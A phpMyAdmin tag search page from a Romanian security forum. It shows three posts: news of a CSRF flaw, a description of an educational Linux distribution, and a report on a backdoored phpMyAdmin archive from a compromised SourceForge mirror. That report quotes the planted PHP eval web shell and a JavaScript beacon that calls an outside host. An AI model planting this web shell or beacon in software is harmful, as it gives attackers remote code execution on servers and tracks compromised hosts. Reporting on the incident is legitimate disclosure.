Jump to content

Search the Community

Showing results for tags 'phpmyadmin'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 3 results

  1. A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link. Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7). Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action. According to an advisory released by phpMyAdmin, "by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc." phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms. Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases. Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link. However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table. Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible. Source: thehackernews.com
  2. Edu * Ro este o distribuție Linux bazata pe Debian Jessie, construita special pentru activități didactice . Distributia construită pe scheletul subfamiliei Debian, conține o multitudine de programe cu licențe libere pentru învățământ, începând cu clasele primare și terminând cu învățământul universitar, precum și diverse programe utilitare cu licențe libere. Distributia contine un installer cu ajutorul căruia pot fi instalate cu un simplu click diverse aplicații specifice pentru matematică, fizică, chimie, geografie, biologie, statistică, electronică, radioamatori, grafică, birou, muzică, editare audio și video, programare, grafică sunt acompaniate de laboratoare virtuale interactive, precum și un microscop virtual. Un laborator de robotică completează cu succes lista de programe pentru educație. O secțiune specială adresată profesorilor, permite acestora crearea de diverse publicații, atât pentru uzul elevilor, cât și pentru publicare online. Installerul permite ca un număr de peste 100 de programe pentru educație sa fie instalate foarte ușor cu un simplu click. O parte din programe sunt specifice distribuției Debian, iar altele sunt create și utilizate de diverse universități de renume din SUA și Europa. Interfața grafică bazata pe MATE , oferă un compromis între un consum redus de resurse și o interfață modernă și intuitivă, astfel încât distribuția poate rula fără probleme pe calculatoare mai vechi existente în unitățile de învățământ. Majoritatea programelor pentru educație prezente în această distribuție sunt sub licența GNU sau BSD, astfel încât costurile se reduc doar la mentenanță. Distribuția poate fi utilizată ca Live DVD, se poate instala ca sistem de operare independent pe hard disk, cât și în cadrul unei aule (experimental). Edu * Ro beta 2 distributie pentru educatie poate fi gasita aici: http://eduro.gnulinux.ro Canal video Edu * Ro https://www.youtube.com/channel/UCEaJUh9rQ3o5tkDpHOyub9g Grup de dezvoltare Edu * Ro https://www.facebook.com/groups/EduRoLinux/ Lista programe instalabile cu ajutorul unui simplu click: Matematica -Cantor -QtOctave -Relational -Rocs -wxMaxima -Euler -eXtrema -FreeMat -Galculator -GeoGebra -Geomview -KAlgebra -Kbruch -Kig -Mathomatic Fizica -Physion -Step -Tracker -Lightspeed Biologie -BALLView -Clustalx -Gwyddion -Cytoscape -SeaView -Treeviewx -StarBiochem Chimie -Datawarrior -Bkchem -Chemtool -GChemPaint Chemical Structures Editor -Gelemental -Jmol -Rasmol -Xmakemol -Avogadro -Cain -EasyChem Chemical Structures Editor -GDIS -Gperiodic -Pymol -Kalzium -Viewmol Profesor -EdiLIM -eXe Electronica -Eagle -Guido Van Robot -Oregano -Qelectrotech -Fritzing -Logisim -QsapecNG Grafica -Art of Illusion -Synfig Studio -Inkscape -K-3D -yEd -Blender -Wings3d -Dia Geografie -Celestia -Kstars -Planets -Google Earth -KGeography -Marble -Stellarium -Qgis Genetica -StarGenetics -StarORF Internet -Chromium -Skype -Midori -Teamviewer -Italc -Iceweasel -Filezilla -NoMachine Programare -Code::Blocks -Ninja IDE -Texstudio -Visual Studio Code -Phpmyadmin -Codelite -Kdevelop -QT4 Creator -SQL Workbench -Eclipse -Bluefish -Netbeans -Anjuta -Geany Arhitectura -LibreCad -FreeCad -BrlCad Multimedia -Ardour -Hydrogen -K3b -Audacious -Audacity -Lives -Vokoscreen -Qtractor -Rosegarden -Vlc -Gnome Mplayer -Kazam -Natron2 Robotica -V-REP-PRO-EDU -Arduino Statistica -Qtiplot -Scidavis -Gretl Virtual Lab -Virtual Microscope Virtuallab -Chimera -Virtual lab Chemistry -MaxFEM -Molecular Workbench -PhET -Logger Pro -VGLII -OpenRocket Diverse -Klettres -KTurtle -Little Wizard -Tux Paint -KTouch -KWordQuiz -Parley -Libre Office -PDFStudio Instalare Code::Blocks
  3. De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP: <?php @eval($_POST['c']); ?> De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate): var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon); Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor. Sursa: Compromised SourceForge mirror
×
×
  • Create New...